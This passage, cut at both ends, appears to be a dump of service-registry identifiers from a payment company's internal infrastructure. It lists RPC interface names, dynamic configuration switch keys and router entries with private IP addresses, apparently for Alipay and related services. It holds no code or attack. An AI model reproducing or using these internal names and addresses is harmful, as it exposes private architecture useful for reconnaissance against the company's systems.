SwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbservcore.common.service.client.spi.SPInterface:1.0:ikbservcenterSPInterface@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.odps2hbase.Odps2hbaseMappingQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.gw.video.api.VideoFeedsGwManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqAlarmLevelDrm.caseAmountLevelLow,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fraudmng:name=com.alipay.securitydata.common.service.indicator.drm.IndicatorSnapshotResource.isStorePreIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkebppcenter.common.service.mobile.api.PromoMobileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.asttshipcore.service.facade.api.query.ConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antuxsys.facade.QuestionnaireMetaInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@foo#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.zcbmarketcenter.common.service.facade.discount.service.CustomerDiscountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.pcredit.PcreditActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.NettingLiquidateInstructionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lightmds.service.adapter.MeshyMdsQueryAdapterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDowngradeDrmImpl.failFixedOrderGotoneDowngrade,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.177.103#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:escrowexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.msgbroker:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.supergw.common.service.rest.IInterfaceConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:exratecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.icifTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_O_SALESMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchportalcore.common.service.mma.facade.api.dingtalk.DingtalkPayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.common.service.facade.ManageAuditContentService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.126.65#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finloancenter.common.service.facade.FinancingDisclosureInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.196.76#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.mybank.bkibdeposit.common.service.facade.account.AccountInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csstrategy.common.service.facade.api.DataContextFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.risk.api.RiskAnalyzeService:1.0:ictu@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.incomerank.api.IncomeRankFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.manager.ClientExperienceExceptManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.solution.ProductSolutionConfigFacade:1.0:PDCORE_ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.149.13#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alibaba.buc.acl.api.service.AccessControlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:sesameCredit_zmcie@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airmng.common.service.facade.logincheck.LoginCheckServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.taobao.crowdcup.hsf.TaskExecutorService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.graycore.changesdk.ops.OpsCallback:1.0:graycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zbdm.common.service.facade.meta.BdmObjPropDistFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:gmerchantrisk@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSchedulerDRMResource.balanceCheckSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilesearch.common.service.facade.SearchRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.darwin.common.service.facade.api.DecisionRuleAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.knowbase.api.KnowBaseManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilequest.common.service.facade.quest.QuestMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.game.service.PcreditMarketGameQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.cluster.ClusterComponentFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.fcbuservice.common.service.facade.manager.AppResourceManager:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:transfercenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetPrepareService:1.0:innertransAssetFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.content.service.facade.RiskTracePunishService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.ActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:antbcremitportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.irecon.common.service.query.fund.api.ReconChannelApiQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.isupergwmng:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.findatacanal.common.service.manage.endowment.EndowmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.249.139#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alifi.shared.component.lock.service.LockBSFacade:1.0:bkloanbillcore-lockBSFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financeprod.fund.facade.api.YebDecisionRuleServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promoplaycenter.common.service.facade.api.PrizeOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.routeclient.interfacename:sffgroup-marketingtools#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.afts.common.service.facade.XnnInferenceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_IPROMOTIONCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.common.CommonBizGrayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.routeclient.DefaultRouteCoordinator.grayKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:security_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accenter.service.query.api.AccenterCategoryRuleQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_ORDER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.fininfo:name=com.alipay.routeclient.DefaultRouteCoordinator.grayKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBack:1.0:clientTradeQuoteCallBackImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.240.117#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.findecision:name=com.alipay.findecision.biz.shared.SystemConfig.isMergeTasksByControlType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.icif.service.facade.apiv2.OperatorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffund.common.service.facade.api.ProcessManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.228.245#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finassetprod.common.facade.FinYearReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cif.facade.StateReportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mservicesinspect.biz.eco.service.EcoUserQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxposition.service.facade.instrument.FxInstrumentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfas.facade.api.ComplianceCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.facade.BaseAddressFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.service.integration.slmtest.SlmTestClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:corgiunit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.poscoreTairCache.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kgcore.common.service.graph.OntologyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.creditcore.service.facade.contract.api.amount.ContAmountQueryForAirFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.common.service.integration.cifuserinfo.UserInfoQueryClientServiceClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csshield.service.facade.api.ResultServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tair.ClusterCapacityFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:169@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.common.AssetSupplierPortalUserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.fininfo.finreconSequenceDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:infosecdemo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappconfig.common.service.facade.mng.AppInfoServiceManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.cds.facade.ContentTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscharityprod.common.service.facade.ClaimFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.apsdk.settlement.apis.HoldMerchantEditService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.operator.AloneOperatorRZService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","config:cn.com.antcloud.guardianconsole.facade.configs.service.GuardianJiuzhouFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.ck:name=com.alipay.zdal.config.groupCluster.paymentmng_SHAREDATA_READDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@finquotationcenter#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.edeductcenter.common.service.facade.EdeductSignPaymentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.pcinstprod.pcinstprod_ds.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.BizCertifyRuleQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tiyubiz.biz.rpc.api.guess.GuessRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igopcore.common.service.facade.MemberQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custview.antg.facade.idmap.AntCustIdMapViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmarketingcore.common.service.facade.rule.RuleEventManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mapi.facade.invoke.ExterfaceInvokeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.deliver.LifeDeliverQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.core.service.xcache.XCacheConsumerClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.0.165.158#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.mashup:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.xxePayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundtaskcenter.service.facade.FixRedeemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcactivitycore.facade.play.group.UserGroupOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestTBaseCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.infosectask:name=com.alipay.holoxlib.core.backtrack.drm.BacktrackConfigResource.holoxCheckEventQps,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecmng.business.NotificationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.config.cache.service.MftransBalanceQuerySwitchCache:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.127.184#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.158.45.58#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openaccess.common.quickaccess.facade.service.proxy.FinatpQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.permlimit.nearshare.drm.UserBetaSwitchConfig.grayScaleListStrA,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acprodapicore.facade.manageapi.ApiMetaManager:1.0:core@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.user.message.UserMessageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.prodquery.common.service.facade.standard.api.arrangement.ArrangementRelationQueryFacade:1.0:zhiMaArrangementRelationQueryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:lifeprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.GrayListManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aeicore.common.service.facade.query.InvestAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloandecision.common.service.facade.service.HbDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.framodel.core.service.facade.api.FramodelIndicatorLineageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finsupport.common.service.facade.outflux.OutfluxMatchService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.store.external.facade.StoreExternalGzFacade:1.0:mrchportalcore_StoreExternalGzFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.OpenProfileQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.ProcessCallback:1.0:antbuservice_antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ldprod.common.service.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifinbatch.service.facade.cicada.IfinbatchCicadaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.processmng.processmng_ds.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.promotion.common.service.facade.api.activitymanage.ActivityBatchAwardTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.userview.config.facade.AuditRecordManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstrategy.common.service.facade.fixedinvestment.FinstrategyTradeStrategyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mychain.baas.common.user.service.FeatureActivationCodeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprotocol.common.service.facade.ShumiUserInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.DiscountDecisionConsultiveService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.verify.VerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bluearmyprod:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.decisionx.facade.InnerDecisionService:1.0:uioservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue30#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ifxquote.service.facade.api.IfxQuoteTaskConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imatchfacade.common.service.facade.delivery.BizApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbpromodataaggr.common.service.facade.api.PromoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.GrayFacade:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:fintradebff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_systemParamCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:custview@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergwlite.service.facade.spi.MessageReceiveService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.UserQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.arrangement.rzone.ArrangementQueryStdRzoneFacade:1.0:mainSite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpmscore.facade.StakeholderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqualitywalleetoe.common.service.facade.api.TestCaseExecutorResultManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.facade.api.InstRefundConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.gloandecision.common.service.facade.credit.api.CreditQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:ordermng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.paygrowth.common.service.facade.task.GrowthProjectRpcTrFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.Arch:name=com.alipay.supergw.service.facade.transaction.ClientRefresher.refresh,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mwalletmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.serializeBlackListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.live.api.LiveActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.72.111#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilesearch.biz.rest.ContactAsrInfoRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:haAsyncExecExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gmodelcenter.common.service.api.standard.details.LoadsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.common.service.facade.specialbusiness.api.CfpSpecialUnfreezeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbretailprod.common.facade.mall.MallMemberFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_RCDISPOSAL#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.settleprod.service.facade.gcard.GCardDepositOrderRecoverService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkcloudfunds.service.manage.api.ComanagementSubAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianmerchant.common.service.api.bxh.InsMobileCodecServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.pointprod.common.util.resource.AsyncOperationResource.stringIsChargeRefundAsync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.userview.facade.PropViewService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.mextitemcenter.common.facade.api.AmapLbsQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.claimoperation.common.service.ClaimVisitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.integration.baoxiancore.CoreClaimServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradequote.api.TradingInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.biz.manager.clearingstat.ClearingCollectStatManage:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.paymentPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bizprodmng:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbpromocore.common.service.backendfacade.api.CampGroupManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.SubjectControlServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.isv.IsvSignManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fincommonbff:name=com.alipay.fincommonbff.drm.Switches.monthReportCrs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.36.25.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.checkroute.common.service.datacollect.HADataClientConfigDrm.batchNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.midas:name=com.alipay.zcache.switcher.midasCommonTair.switcherValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.common.webx.session.drm.SessionLogDrm.formtokenSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.mobilesession.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.hypTair.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.228.151#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchasset.common.service.facade.purchases.AssetPurchasesGoodsItemCompositiveInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=midas.LocalCacheRefreshDRMControl.localCacheRefreshList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilerelation.common.service.facade.tlou.TlouPersonEntityRelationEntityInternalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:afsc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.zskynet.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:ipsponsorprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.